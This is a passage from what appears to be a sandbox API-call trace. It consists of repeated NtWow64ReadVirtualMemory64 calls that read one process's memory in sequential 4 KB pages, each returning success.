Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.842] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d2000, Buffer=0x7ff8, BufferSize=0x25d2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.842] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d3000, Buffer=0x7ff8, BufferSize=0x25d3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.843] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d4000, Buffer=0x7ff8, BufferSize=0x25d4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.843] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d5000, Buffer=0x7ff8, BufferSize=0x25d5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.843] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d6000, Buffer=0x7ff8, BufferSize=0x25d6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.843] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d7000, Buffer=0x7ff8, BufferSize=0x25d7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.843] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d8000, Buffer=0x7ff8, BufferSize=0x25d8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.843] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d9000, Buffer=0x7ff8, BufferSize=0x25d9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.843] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3da000, Buffer=0x7ff8, BufferSize=0x25da000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.844] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3db000, Buffer=0x7ff8, BufferSize=0x25db000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.844] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3dc000, Buffer=0x7ff8, BufferSize=0x25dc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.844] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3dd000, Buffer=0x7ff8, BufferSize=0x25dd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.844] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3de000, Buffer=0x7ff8, BufferSize=0x25de000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.844] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3df000, Buffer=0x7ff8, BufferSize=0x25df000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.844] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e0000, Buffer=0x7ff8, BufferSize=0x25e0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.844] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e1000, Buffer=0x7ff8, BufferSize=0x25e1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.844] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e2000, Buffer=0x7ff8, BufferSize=0x25e2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.845] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e3000, Buffer=0x7ff8, BufferSize=0x25e3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.845] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e4000, Buffer=0x7ff8, BufferSize=0x25e4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.845] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e5000, Buffer=0x7ff8, BufferSize=0x25e5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.845] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e6000, Buffer=0x7ff8, BufferSize=0x25e6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.845] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e7000, Buffer=0x7ff8, BufferSize=0x25e7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.845] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e8000, Buffer=0x7ff8, BufferSize=0x25e8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.845] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e9000, Buffer=0x7ff8, BufferSize=0x25e9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.846] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ea000, Buffer=0x7ff8, BufferSize=0x25ea000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.846] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3eb000, Buffer=0x7ff8, BufferSize=0x25eb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.846] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ec000, Buffer=0x7ff8, BufferSize=0x25ec000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.846] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ed000, Buffer=0x7ff8, BufferSize=0x25ed000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.846] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ee000, Buffer=0x7ff8, BufferSize=0x25ee000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.846] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ef000, Buffer=0x7ff8, BufferSize=0x25ef000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.846] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f0000, Buffer=0x7ff8, BufferSize=0x25f0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.847] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f1000, Buffer=0x7ff8, BufferSize=0x25f1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.847] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f2000, Buffer=0x7ff8, BufferSize=0x25f2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.847] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f3000, Buffer=0x7ff8, BufferSize=0x25f3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.847] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f4000, Buffer=0x7ff8, BufferSize=0x25f4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.847] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f5000, Buffer=0x7ff8, BufferSize=0x25f5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.847] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f6000, Buffer=0x7ff8, BufferSize=0x25f6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.847] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f7000, Buffer=0x7ff8, BufferSize=0x25f7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.848] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f8000, Buffer=0x7ff8, BufferSize=0x25f8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.848] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f9000, Buffer=0x7ff8, BufferSize=0x25f9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.848] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3fa000, Buffer=0x7ff8, BufferSize=0x25fa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.848] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3fb000, Buffer=0x7ff8, BufferSize=0x25fb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.848] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3fc000, Buffer=0x7ff8, BufferSize=0x25fc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.848] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3fd000, Buffer=0x7ff8, BufferSize=0x25fd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.848] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3fe000, Buffer=0x7ff8, BufferSize=0x25fe000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.849] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ff000, Buffer=0x7ff8, BufferSize=0x25ff000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.849] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee400000, Buffer=0x7ff8, BufferSize=0x2600000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.849] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee401000, Buffer=0x7ff8, BufferSize=0x2601000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.849] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee402000, Buffer=0x7ff8, BufferSize=0x2602000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.849] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee403000, Buffer=0x7ff8, BufferSize=0x2603000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.849] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee404000, Buffer=0x7ff8, BufferSize=0x2604000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.849] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee405000, Buffer=0x7ff8, BufferSize=0x2605000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.850] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee406000, Buffer=0x7ff8, BufferSize=0x2606000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.850] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee407000, Buffer=0x7ff8, BufferSize=0x2607000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.850] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee408000, Buffer=0x7ff8, BufferSize=0x2608000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.850] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee409000, Buffer=0x7ff8, BufferSize=0x2609000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.850] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee40a000, Buffer=0x7ff8, BufferSize=0x260a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.850] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee40b000, Buffer=0x7ff8, BufferSize=0x260b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.850] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee40c000, Buffer=0x7ff8, BufferSize=0x260c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.851] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee40d000, Buffer=0x7ff8, BufferSize=0x260d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.851] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee40e000, Buffer=0x7ff8, BufferSize=0x260e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.851] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee40f000, Buffer=0x7ff8, BufferSize=0x260f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.851] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee410000, Buffer=0x7ff8, BufferSize=0x2610000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.851] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee411000, Buffer=0x7ff8, BufferSize=0x2611000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.851] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee412000, Buffer=0x7ff8, BufferSize=0x2612000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.851] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee413000, Buffer=0x7ff8, BufferSize=0x2613000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.852] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee414000, Buffer=0x7ff8, BufferSize=0x2614000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.852] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee415000, Buffer=0x7ff8, BufferSize=0x2615000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.852] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee416000, Buffer=0x7ff8, BufferSize=0x2616000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.852] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee417000, Buffer=0x7ff8, BufferSize=0x2617000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.852] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee418000, Buffer=0x7ff8, BufferSize=0x2618000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.852] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee419000, Buffer=0x7ff8, BufferSize=0x2619000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.852] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee41a000, Buffer=0x7ff8, BufferSize=0x261a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.853] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee41b000, Buffer=0x7ff8, BufferSize=0x261b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.853] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee41c000, Buffer=0x7ff8, BufferSize=0x261c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.853] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee41d000, Buffer=0x7ff8, BufferSize=0x261d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.853] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee41e000, Buffer=0x7ff8, BufferSize=0x261e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.853] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee41f000, Buffer=0x7ff8, BufferSize=0x261f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.853] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee420000, Buffer=0x7ff8, BufferSize=0x2620000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.853] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee421000, Buffer=0x7ff8, BufferSize=0x2621000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.854] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee422000, Buffer=0x7ff8, BufferSize=0x2622000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.854] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee423000, Buffer=0x7ff8, BufferSize=0x2623000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.854] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee424000, Buffer=0x7ff8, BufferSize=0x2624000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.854] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee425000, Buffer=0x7ff8, BufferSize=0x2625000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.854] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee426000, Buffer=0x7ff8, BufferSize=0x2626000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.855] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee427000, Buffer=0x7ff8, BufferSize=0x2627000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.855] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee428000, Buffer=0x7ff8, BufferSize=0x2628000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.855] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee429000, Buffer=0x7ff8, BufferSize=0x2629000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.856] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee42a000, Buffer=0x7ff8, BufferSize=0x262a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.856] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee42b000, Buffer=0x7ff8, BufferSize=0x262b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.856] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee42c000, Buffer=0x7ff8, BufferSize=0x262c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.856] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee42d000, Buffer=0x7ff8, BufferSize=0x262d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.856] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee42e000, Buffer=0x7ff8, BufferSize=0x262e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.856] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee42f000, Buffer=0x7ff8, BufferSize=0x262f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.856] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee430000, Buffer=0x7ff8, BufferSize=0x2630000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.857] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee431000, Buffer=0x7ff8, BufferSize=0x2631000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.857] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee432000, Buffer=0x7ff8, BufferSize=0x2632000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.857] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee433000, Buffer=0x7ff8, BufferSize=0x2633000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.857] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee434000, Buffer=0x7ff8, BufferSize=0x2634000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.857] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee435000, Buffer=0x7ff8, BufferSize=0x2635000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.857] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee436000, Buffer=0x7ff8, BufferSize=0x2636000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.857] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee437000, Buffer=0x7ff8, BufferSize=0x2637000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.858] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee438000, Buffer=0x7ff8, BufferSize=0x2638000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.858] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee439000, Buffer=0x7ff8, BufferSize=0x2639000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.858] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee43a000, Buffer=0x7ff8, BufferSize=0x263a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.858] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee43b000, Buffer=0x7ff8, BufferSize=0x263b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.858] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee43c000, Buffer=0x7ff8, BufferSize=0x263c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.858] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee43d000, Buffer=0x7ff8, BufferSize=0x263d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.872] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee43e000, Buffer=0x7ff8, BufferSize=0x263e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.872] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee43f000, Buffer=0x7ff8, BufferSize=0x263f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.872] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee440000, Buffer=0x7ff8, BufferSize=0x2640000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.873] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee441000, Buffer=0x7ff8, BufferSize=0x2641000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.873] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee442000, Buffer=0x7ff8, BufferSize=0x2642000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.873] 